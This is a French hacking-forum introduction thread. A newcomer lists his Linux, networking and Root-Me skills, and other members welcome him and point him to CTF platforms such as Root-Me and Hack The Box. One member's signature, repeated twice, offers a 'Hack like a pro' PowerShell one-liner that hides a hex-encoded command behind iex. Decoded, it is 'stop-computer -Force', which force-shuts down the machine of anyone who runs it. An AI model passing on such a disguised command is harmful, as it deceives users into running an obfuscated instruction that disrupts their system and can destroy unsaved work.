Annonce

Réduire
Aucune annonce.

Présentation - bambish

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Présentation - bambish

    Bonjour à tous,

    Pseudo: bambish

    Connaissances informatiques générales :
    - Administration systèmes Linux
    - Administration AD (notions de base)
    - Réseau (routing, switching, firewalling, bridging)
    - Troubleshooting
    - Python
    - Bash (notions de base)
    - C++
    - HTML (appri mais pas pratiqué)
    - PHP (appri mais pas pratiqué)
    - CSS (appri mais pas pratiqué)
    - SQL

    Connaissances en hacking : Plutôt que de faire une liste exhaustive, voici mon profil root-me:
    - App Script: 21%
    - App Système: 0%
    - Cracking: 12%
    - Crypto: 11%
    - Forensic: 20%
    - Programmation: 50%
    - Réaliste: 4%
    - Réseau: 59%
    - Stégono: 67%
    - Web client: 56%
    - Web serveur! 47%

    Système d'exploitation principal : Ubuntu/Kali

    Je viens sur ce forum pour :
    Me perfectionner, trouver une nouvelle source d'information sur des sujets que je n'ai pas forcément la chance d'aborder au quotidien.
    Je recherche également une communauté me permettant de rester de manière durable dans le "bain du hacking". Jusqu'à présent les progrès que j'ai fait sur le sujet se sont fait par à-coups.

    J'ai connu ce forum via : Google + discussion dans mon entourage


    J'espère pouvoir apporter au mieux ma pierre à l'édifice et que ce dernier m'aide à m'élever

    A bientôt.

  • #2
    Salut, bienvenue
    Ya des domaines qui te plaisent plus que d’autres ?
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Merci de l'accueil

      En règle général je préfère les attaques réseaux et les automatiser. Les failles Web me plaisent bien aussi.
      Par contre tout ce qui est purement système et application (type buffer overflow) pour le moment c'est pas mon truc. Je me suis un peux penché sur la question mais je n'avais pas trop accroché sur le coup. Il faudrait que je m'y remette sérieusement cette fois et je pourrais sûrement y prendre goût.

      Après j'aimerais bien essayer des CTF mais je n'ai pour le moment jamais tenté l'expérience. J'en vois régulièrement sur root-me mais je ne sais pas si je serais au niveau pour vraiment en profiter.

      En bref j'ai encore pas mal de choses à voir avant de savoir ce qui me plaira vraiment plus que le reste.

      Commentaire


      • #4
        Les CTF all the day de root-me sont pas mal, t'as rien à perdre à essayer de toute façon.
        L'aventage, c'est que c'est des situations relativement réalistes. En tous cas plus que 90% des challs dispos sur root-me. Du coup perso je trouve ça plus formateur.

        Sinon comme très bonne plateforme t'as : https://www.hackthebox.eu/

        ./Kriss
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Oui c'est sûr.
          Je vais prendre le temps d'en faire un histoire de voir comment ça se passe.

          Commentaire

          Chargement...
          X